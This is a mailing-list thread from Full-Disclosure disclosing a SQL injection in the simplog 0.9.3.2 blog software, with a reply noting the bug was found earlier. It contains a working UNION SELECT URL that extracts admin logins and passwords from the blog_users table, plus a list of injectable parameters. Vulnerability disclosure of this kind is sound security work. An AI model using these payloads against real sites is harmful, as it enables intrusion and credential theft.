Re: [Full-disclosure] simplog 0.9.3.2 SQL injection

[Javor Ninov <drfrancky () securax org>]

str0ke ,
looks like i reinvented the wheel :-)) . i didn't make any research. a
friend of mine installed the latest version of this software and voila...


str0ke wrote:
> Javor,
>
> It seems rgod found this vulnerability back in April of 2006.
>
> http://www.milw0rm.com/exploits/1663
>
> <>
>  ii)
>  http://[target]/[path]/index.php?blogid=[sql]
>  http://[target]/[path]/archive.php?blogid=[sql]
>  http://[target]/[path]/archive.php?m=[sql]
>  http://[target]/[path]/archive.php?y=[sql]
>
> /str0ke
>
> On 1/1/07, Javor Ninov <drfrancky () securax org> wrote:
> > Afected Software:
> > simplog up to 0.9.3.2 (latest version - 12/05/2006 )
> >
> > Site:
> > http://www.simplog.org
> > Simplog provides an easy way for users to add blogging capabilities to
> > their existing websites. Simplog is written in PHP and compatible with
> > multiple databases. Simplog also features an RSS/Atom aggregator/reader.
> > Powerful, yet simple
> >
> > Vulnerability:
> > SQL Injection in archive.php
> > other files probably also affected
> >
> > Example:
> > http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1
> >
> >
> > Vendor status:
> > NOT NOTIFIED
> >
> >
> > Javor Ninov aka DrFrancky
> > drfrancky shift+2 securax.org
> > http://securitydot.net/
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/

Attachment: signature.asc
Description: OpenPGP digital signature